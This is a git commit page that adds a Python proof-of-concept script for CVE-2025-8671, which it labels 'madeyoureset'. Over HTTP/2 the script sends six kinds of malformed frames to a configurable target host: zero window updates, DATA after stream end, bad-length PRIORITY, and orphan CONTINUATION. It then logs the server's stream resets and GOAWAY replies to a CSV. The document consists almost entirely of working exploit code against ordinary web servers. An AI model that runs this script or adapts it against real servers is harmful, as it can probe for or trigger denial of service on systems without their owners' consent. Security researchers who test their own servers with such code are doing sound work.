Create PoC_CVE-2025-8671.py
This commit is contained in:
188
PoC_CVE-2025-8671.py
Normal file
188
PoC_CVE-2025-8671.py
Normal file
@@ -0,0 +1,188 @@
|
||||
#!/usr/bin/env python3
|
||||
import ssl, socket, time, struct, csv, os
|
||||
from datetime import datetime
|
||||
from h2.connection import H2Connection
|
||||
from h2.events import ResponseReceived, StreamReset, SettingsAcknowledged
|
||||
|
||||
TARGET_HOST = "dominio.com.br"
|
||||
TARGET_PORT = 443
|
||||
PATHS = ["/path"]
|
||||
ATTEMPTS_PER_VECTOR = 10
|
||||
SLEEP_BETWEEN = 0.02
|
||||
CSV_OUT = "poc_madeyoureset_results.csv"
|
||||
|
||||
UA = "madeyoureset-poc"
|
||||
|
||||
def send_frame(sock, frame_type, flags, stream_id, payload):
|
||||
hdr = struct.pack("!I", ((len(payload) & 0xFFFFFF) << 8) | (frame_type & 0xFF))
|
||||
hdr += struct.pack("!B", flags & 0xFF)
|
||||
hdr += struct.pack("!I", stream_id & 0x7FFFFFFF)
|
||||
sock.sendall(hdr + payload)
|
||||
|
||||
def frame_window_update(sock, stream_id, increment):
|
||||
payload = struct.pack("!I", increment & 0x7FFFFFFF)
|
||||
send_frame(sock, 0x8, 0x0, stream_id, payload)
|
||||
|
||||
def frame_data_after_end(sock, stream_id):
|
||||
send_frame(sock, 0x0, 0x0, stream_id, b"x")
|
||||
|
||||
def frame_headers_zero_len(sock, stream_id):
|
||||
send_frame(sock, 0x1, 0x4, stream_id, b"")
|
||||
|
||||
def frame_priority_bad_len(sock, stream_id):
|
||||
send_frame(sock, 0x2, 0x0, stream_id, b"\x00\x00\x00\x00")
|
||||
|
||||
def frame_continuation_without_headers(sock, stream_id):
|
||||
send_frame(sock, 0x9, 0x4, stream_id, b"")
|
||||
|
||||
def open_h2_socket(host, port):
|
||||
ctx = ssl.create_default_context()
|
||||
ctx.set_alpn_protocols(["h2"])
|
||||
s = socket.create_connection((host, port))
|
||||
tls = ctx.wrap_socket(s, server_hostname=host)
|
||||
if tls.selected_alpn_protocol() != "h2":
|
||||
raise RuntimeError("ALPN não negociou h2")
|
||||
tls.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
|
||||
return tls
|
||||
|
||||
def init_h2(tls_sock):
|
||||
h2c = H2Connection()
|
||||
h2c.initiate_connection()
|
||||
tls_sock.sendall(h2c.data_to_send())
|
||||
tls_sock.settimeout(0.5)
|
||||
try:
|
||||
d = tls_sock.recv(65535)
|
||||
if d:
|
||||
h2c.receive_data(d)
|
||||
tls_sock.sendall(h2c.data_to_send())
|
||||
except Exception:
|
||||
pass
|
||||
return h2c
|
||||
|
||||
def do_attempt(vector_name, attempt_idx, path):
|
||||
rec = {
|
||||
"ts": datetime.utcnow().isoformat() + "Z",
|
||||
"vector": vector_name,
|
||||
"attempt": attempt_idx,
|
||||
"path": path,
|
||||
"rst_stream": 0,
|
||||
"goaway": 0,
|
||||
"responses": 0,
|
||||
"conn_closed_early": 0,
|
||||
"error": ""
|
||||
}
|
||||
try:
|
||||
sock = open_h2_socket(TARGET_HOST, TARGET_PORT)
|
||||
h2c = init_h2(sock)
|
||||
|
||||
qs = f"?poc=madeyoureset&v={vector_name}&n={attempt_idx}"
|
||||
full_path = path + qs
|
||||
|
||||
stream_id = h2c.get_next_available_stream_id()
|
||||
end_stream_first = vector_name in {
|
||||
"V1_WINDOW_UPDATE_ZERO_STREAM",
|
||||
"V3_DATA_AFTER_END",
|
||||
"V4_HEADERS_ZERO_LEN_AFTER_END",
|
||||
"V5_PRIORITY_BAD_LEN_AFTER_END",
|
||||
}
|
||||
|
||||
try:
|
||||
h2c.send_headers(stream_id, [
|
||||
(":method", "GET"),
|
||||
(":scheme", "https"),
|
||||
(":authority", TARGET_HOST),
|
||||
(":path", full_path),
|
||||
("user-agent", UA),
|
||||
("x-poc-vector", f"{vector_name}-{attempt_idx}") # Cabeçalho genérico
|
||||
], end_stream=end_stream_first)
|
||||
sock.sendall(h2c.data_to_send())
|
||||
except Exception as e:
|
||||
rec["conn_closed_early"] = 1
|
||||
rec["error"] = f"send_headers: {e}"
|
||||
try: sock.close()
|
||||
except: pass
|
||||
return rec
|
||||
|
||||
try:
|
||||
if vector_name == "V1_WINDOW_UPDATE_ZERO_STREAM":
|
||||
frame_window_update(sock, stream_id, 0)
|
||||
elif vector_name == "V2_WINDOW_UPDATE_ZERO_CONN":
|
||||
frame_window_update(sock, 0, 0)
|
||||
elif vector_name == "V3_DATA_AFTER_END":
|
||||
frame_data_after_end(sock, stream_id)
|
||||
elif vector_name == "V4_HEADERS_ZERO_LEN_AFTER_END":
|
||||
frame_headers_zero_len(sock, stream_id)
|
||||
elif vector_name == "V5_PRIORITY_BAD_LEN_AFTER_END":
|
||||
frame_priority_bad_len(sock, stream_id)
|
||||
elif vector_name == "V6_CONTINUATION_WITHOUT_HEADERS":
|
||||
sid2 = h2c.get_next_available_stream_id()
|
||||
frame_continuation_without_headers(sock, sid2)
|
||||
else:
|
||||
raise RuntimeError("vetor desconhecido")
|
||||
except Exception as e:
|
||||
rec["error"] = f"send_vector: {e}"
|
||||
|
||||
sock.settimeout(0.2)
|
||||
t_end = time.time() + 0.6
|
||||
while time.time() < t_end:
|
||||
try:
|
||||
d = sock.recv(65535)
|
||||
if not d:
|
||||
break
|
||||
events = h2c.receive_data(d)
|
||||
for ev in events:
|
||||
if isinstance(ev, StreamReset):
|
||||
rec["rst_stream"] += 1
|
||||
elif isinstance(ev, ResponseReceived):
|
||||
rec["responses"] += 1
|
||||
elif isinstance(ev, SettingsAcknowledged):
|
||||
pass
|
||||
elif ev.__class__.__name__ == "ConnectionTerminated":
|
||||
rec["goaway"] += 1
|
||||
tosend = h2c.data_to_send()
|
||||
if tosend:
|
||||
sock.sendall(tosend)
|
||||
except Exception:
|
||||
break
|
||||
|
||||
try: sock.close()
|
||||
except: pass
|
||||
return rec
|
||||
|
||||
except Exception as e:
|
||||
rec["error"] = f"conn/setup: {e}"
|
||||
rec["conn_closed_early"] = 1
|
||||
return rec
|
||||
|
||||
def main():
|
||||
vectors = [
|
||||
"V1_WINDOW_UPDATE_ZERO_STREAM",
|
||||
"V2_WINDOW_UPDATE_ZERO_CONN",
|
||||
"V3_DATA_AFTER_END",
|
||||
"V4_HEADERS_ZERO_LEN_AFTER_END",
|
||||
"V5_PRIORITY_BAD_LEN_AFTER_END",
|
||||
"V6_CONTINUATION_WITHOUT_HEADERS",
|
||||
]
|
||||
|
||||
new_file = not os.path.exists(CSV_OUT)
|
||||
with open(CSV_OUT, "a", newline="") as f:
|
||||
w = csv.DictWriter(f, fieldnames=[
|
||||
"ts","vector","attempt","path",
|
||||
"rst_stream","goaway","responses",
|
||||
"conn_closed_early","error"
|
||||
])
|
||||
if new_file:
|
||||
w.writeheader()
|
||||
|
||||
for vec in vectors:
|
||||
for n in range(1, ATTEMPTS_PER_VECTOR + 1):
|
||||
for p in PATHS:
|
||||
rec = do_attempt(vec, n, p)
|
||||
w.writerow(rec)
|
||||
print(rec)
|
||||
time.sleep(SLEEP_BETWEEN)
|
||||
|
||||
if __name__ == "__main__":
|
||||
print(f"[INFO] Target: https://{TARGET_HOST}:{TARGET_PORT} Paths: {PATHS}")
|
||||
print(f"[INFO] Attempts per vector: {ATTEMPTS_PER_VECTOR}")
|
||||
main()
|
||||
Reference in New Issue
Block a user